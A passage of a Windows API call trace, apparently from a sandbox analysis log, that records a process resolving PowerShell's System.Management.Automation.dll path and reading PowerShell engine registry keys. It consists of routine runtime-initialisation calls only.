lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce5ec | out: phkResult=0x1ce5ec*=0x328) returned 0x0 [0027.370] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce634, lpData=0x0, lpcbData=0x1ce630*=0x0 | out: lpType=0x1ce634*=0x1, lpData=0x0, lpcbData=0x1ce630*=0x56) returned 0x0 [0027.370] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce634, lpData=0x2b64c0, lpcbData=0x1ce630*=0x56 | out: lpType=0x1ce634*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce630*=0x56) returned 0x0 [0027.371] RegCloseKey (hKey=0x328) returned 0x0 [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.371] GetLastError () returned 0xcb [0027.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.380] GetLastError () returned 0xcb [0027.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.380] GetLastError () returned 0xcb [0027.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.380] GetLastError () returned 0xcb [0027.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.380] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.381] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.382] GetLastError () returned 0xcb [0027.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.383] GetLastError () returned 0xcb [0027.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.384] GetLastError () returned 0xcb [0027.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd734, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.390] GetLastError () returned 0xcb [0027.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.391] GetLastError () returned 0xcb [0027.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 